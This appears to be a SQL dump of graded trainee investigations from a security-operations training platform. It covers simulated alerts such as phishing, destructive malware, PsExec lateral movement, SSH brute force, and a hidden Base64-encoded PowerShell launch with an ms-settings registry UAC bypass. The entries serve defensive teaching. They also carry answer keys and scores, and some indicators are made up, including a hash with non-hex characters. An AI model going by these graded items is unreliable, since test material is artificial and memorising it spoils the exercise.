(502, 229, 1257, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-192.168.1.102\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 4:21:46 PM\\nALERT: False Positive: Normal Network Traffic Misidentified as Anomaly\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 192.168.1.102\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T23:21:53.224Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 02:25:25', '2026-03-10 23:19:25', '2026-03-10 23:21:53', 0, NULL),
(503, 229, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"collect_forensics\",\"block_ip\",\"isolate_host\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 6:22:27 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T01:22:29.469Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"block_hash\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 01:20:21', '2026-03-11 01:22:29', 0, NULL),
(504, 34, 1466, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 02:54:56', '2026-03-11 02:54:56', 0, NULL),
(507, 225, 1461, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.123.231.45\",\"ip-192.168.1.25\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:20:34 PM\\nALERT: Initial Access: Spear Phishing Campaign [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 185.123.231.45\\n- [IP] 192.168.1.25\\n- [EMAIL] j.smith@sonypictures.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:20:47.507Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 06:23:21', '2026-03-11 03:18:21', '2026-03-11 03:20:47', 0, NULL),
(508, 225, 1462, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-a9f5d8e7\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:21:41 PM\\nALERT: Execution: Deployment of Destructive Malware [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\n- [FILENAME] destructive_payload.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:21:50.908Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:20:47', '2026-03-11 03:21:50', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(509, 225, 1463, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.168.1.100\",\"ip-10.0.0.25\",\"hash-b6a9b3f8\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:22:51 PM\\nALERT: Persistence: Establishing Backdoor Access [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.168.1.100\\n- [IP] 10.0.0.25\\n- [HASH] b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\\n- [FILENAME] nc.exe\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:23:02.558Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:21:50', '2026-03-11 03:23:02', 0, NULL),
(510, 225, 1464, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.45.23\",\"ip-192.168.1.105\",\"hash-f5d5a6b9\",\"artifact_1\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:43:37 PM\\nALERT: Lateral Movement: Expanding Reach within the Network [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.0.45.23\\n- [IP] 192.168.1.105\\n- [HASH] f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\\n- [IP] 203.0.113.45\\n- [FILENAME] malware_payload.dll\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:43:39.524Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:23:02', '2026-03-11 03:43:39', 0, NULL),
(511, 225, 1465, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-45.76.23.17\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:44:50 PM\\nALERT: Exfiltration: Data Theft and Leakage [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 45.76.23.17\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [FILENAME] confidential_report_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:44:56.782Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:43:39', '2026-03-11 03:44:56', 0, NULL),
(512, 277, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 11:47:29', '2026-03-11 11:47:29', 0, NULL),
(513, 277, 1248, 'investigating', NULL, NULL, NULL, NULL, '2026-03-11 14:54:11', '2026-03-11 11:48:11', '2026-03-11 11:48:11', 0, NULL),
(514, 232, 1461, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.123.231.45\",\"ip-192.168.1.25\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:21:37 PM\\nALERT: Initial Access: Spear Phishing Campaign [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 185.123.231.45\\n- [IP] 192.168.1.25\\n- [EMAIL] j.smith@sonypictures.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:51:38.339Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 20:56:51', '2026-03-11 17:50:51', '2026-03-11 17:51:38', 0, NULL),
(515, 232, 1462, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-a9f5d8e7\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:23:40 PM\\nALERT: Execution: Deployment of Destructive Malware [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\n- [FILENAME] destructive_payload.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:53:44.421Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:51:38', '2026-03-11 17:53:44', 0, NULL),
(516, 232, 1463, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.168.1.100\",\"ip-10.0.0.25\",\"hash-b6a9b3f8\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:25:37 PM\\nALERT: Persistence: Establishing Backdoor Access [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.168.1.100\\n- [IP] 10.0.0.25\\n- [HASH] b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\\n- [FILENAME] nc.exe\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:55:37.623Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:53:44', '2026-03-11 17:55:37', 0, NULL),
(517, 232, 1464, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.45.23\",\"ip-192.168.1.105\",\"hash-f5d5a6b9\",\"artifact_1\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:26:13 PM\\nALERT: Lateral Movement: Expanding Reach within the Network [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.0.45.23\\n- [IP] 192.168.1.105\\n- [HASH] f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\\n- [IP] 203.0.113.45\\n- [FILENAME] malware_payload.dll\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:56:13.586Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:55:37', '2026-03-11 17:56:13', 0, NULL),
(518, 232, 1465, 'graded', 82, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-45.76.23.17\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:27:43 PM\\nALERT: Exfiltration: Data Theft and Leakage [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 45.76.23.17\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [FILENAME] confidential_report_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:57:53.895Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:56:13', '2026-03-11 17:57:53', 0, NULL),
(519, 282, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 23:46:37', '2026-03-11 23:46:37', 0, NULL),
(520, 283, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 23:58:53', '2026-03-11 23:58:53', 0, NULL),
(521, 283, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The log shows that the email came from the address noreply@secure-bank.com , and the link leads to the same domain http://secure-bank.com/login . At first glance, it looks consistent. However, there are two critical signs of phishing: The link uses HTTP instead of secure HTTPS — real banks never use an unencrypted connection for login pages. The sender\'s IP address 198.51.100.22 belongs to the test range, which should not be used in real mail. These signs indicate that the attackers are imitating the bank in order to steal the credentials of the target_user user.\",\"artifacts\":\"198.51.100.22, http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"The log shows that the email came from the address noreply@secure-bank.com , and the link leads to the same domain http://secure-bank.com/login . At first glance, it looks consistent. However, there are two critical signs of phishing: The link uses HTTP instead of secure HTTPS — real banks never use an unencrypted connection for login pages. The sender\'s IP address 198.51.100.22 belongs to the test range, which should not be used in real mail. These signs indicate that the attackers are imitating the bank in order to steal the credentials of the target_user user.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:07:05.549Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 03:14:35', '2026-03-12 00:09:35', '2026-03-12 12:08:00', 0, NULL),
(522, 285, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 07:27:36', '2026-03-12 07:27:36', 0, NULL),
(523, 281, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 09:53:38', '2026-03-12 09:53:38', 0, NULL),
(524, 289, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 10:05:59', '2026-03-12 10:05:59', 0, NULL),
(525, 42, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"It seems like a false positive alert, as it has been sent from the bank.\",\"artifacts\":\"http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"It seems like a false positive alert, as it has been sent from the bank.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T11:46:50.416Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 14:51:05', '2026-03-12 11:41:05', '2026-03-12 11:48:00', 0, NULL),
(526, 42, 234, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 14:57:08', '2026-03-12 11:48:08', '2026-03-12 11:48:08', 0, NULL),
(527, 283, 234, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The log shows the execution of the process (process_execution) from host 10.0.0.20 to host 10.0.0.25. According to the incident description, the action was performed using the PsExec utility. The use of PsExec to connect to remote nodes within the network is a typical sign of Horizontal Movement, which is often used by attackers after the initial hacking. Even when using the admin_user account, such activity requires immediate investigation, as it may indicate a compromise of the administrator\'s credentials.\",\"artifacts\":\"10.0.0.20, 10.0.0.25, PSExec\",\"analysis_answers\":{\"action_taken\":\"The log shows the execution of the process (process_execution) from host 10.0.0.20 to host 10.0.0.25. According to the incident description, the action was performed using the PsExec utility. The use of PsExec to connect to remote nodes within the network is a typical sign of Horizontal Movement, which is often used by attackers after the initial hacking. Even when using the admin_user account, such activity requires immediate investigation, as it may indicate a compromise of the administrator\'s credentials.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:25:44.029Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:15:32', '2026-03-12 12:08:32', '2026-03-12 12:26:00', 0, NULL),
(528, 42, 750, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/1)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.20\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12/03/2026, 13:15:12\\nALERT: Suspicious Email Detected - Potential False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.20\\n- [URL] https://example-trusted-site.com/document\\n- [EMAIL] trusted.source@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T12:15:23.959Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-12 15:13:42', '2026-03-12 12:08:42', '2026-03-12 12:15:23', 0, NULL),
(529, 283, 235, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"A surge in network traffic was recorded on the data-server under the service_account account.\\nThis indicates an automated process (such as data backup or synchronization), which is a normal activity for this type of server.\\nThe priority of the incident is indicated as Low, which does not correspond to the criticality of a real data leak (Exfiltration).\\nNo additional indicators of compromise (suspicious processes, abnormal time) were found.\",\"artifacts\":\"192.168.1.10, 203.0.113.100, service_account\",\"analysis_answers\":{\"action_taken\":\"A surge in network traffic was recorded on the data-server under the service_account account.\\nThis indicates an automated process (such as data backup or synchronization), which is a normal activity for this type of server.\\nThe priority of the incident is indicated as Low, which does not correspond to the criticality of a real data leak (Exfiltration).\\nNo additional indicators of compromise (suspicious processes, abnormal time) were found.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:35:34.417Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:36:16', '2026-03-12 12:26:16', '2026-03-12 12:36:00', 0, NULL),
(530, 283, 236, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"There were 150 failed login attempts (attempt count: 150) from one IP address (192.0.2.45) to SSH port (22) under the admin account.\\nSuch a number of unsuccessful attempts in a short time is a characteristic feature of an automated Brute Force attack (password brute force).\\nThe attacker\'s goal was to gain unauthorized access to the internal system. The \\\"Brute Force Detection Policy\\\" protection rule has been activated.\",\"artifacts\":\"192.0.2.45, port 22, admin\",\"analysis_answers\":{\"action_taken\":\"There were 150 failed login attempts (attempt count: 150) from one IP address (192.0.2.45) to SSH port (22) under the admin account.\\nSuch a number of unsuccessful attempts in a short time is a characteristic feature of an automated Brute Force attack (password brute force).\\nThe attacker\'s goal was to gain unauthorized access to the internal system. The \\\"Brute Force Detection Policy\\\" protection rule has been activated.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:51:07.762Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:41:07', '2026-03-12 12:36:07', '2026-03-12 12:52:00', 0, NULL),
(531, 283, 242, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Обнаружен запуск PowerShell с признаками вредоносной активности:\\nИспользование ключей скрытности: -NoP, -NonI, -W Hidden.\\nПередача закодированной команды (Base64) через параметр -E, что указывает на обфускацию кода.\\nРодительский процесс explorer.exe suggests запуск через действие пользователя (открытие файла).\\nЗафиксирована модификация реестра в ключе HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, что является известным методом обхода UAC (повышения привилегий).\\nНаличие сетевой активности на порт 80.\\nСовокупность этих факторов однозначно указывает на выполнение вредоносного скрипта.\",\"artifacts\":\"powershell.exe -E JABzAHQAcg..., HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, 2B2B6D120897FBB5783C3F8DCF57DBBA\",\"analysis_answers\":{\"action_taken\":\"Обнаружен запуск PowerShell с признаками вредоносной активности:\\nИспользование ключей скрытности: -NoP, -NonI, -W Hidden.\\nПередача закодированной команды (Base64) через параметр -E, что указывает на обфускацию кода.\\nРодительский процесс explorer.exe suggests запуск через действие пользователя (открытие файла).\\nЗафиксирована модификация реестра в ключе HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, что является известным методом обхода UAC (повышения привилегий).\\nНаличие сетевой активности на порт 80.\\nСовокупность этих факторов однозначно указывает на выполнение вредоносного скрипта.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T13:10:21.064Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 16:05:43', '2026-03-12 12:57:43', '2026-03-12 13:11:00', 0, NULL),
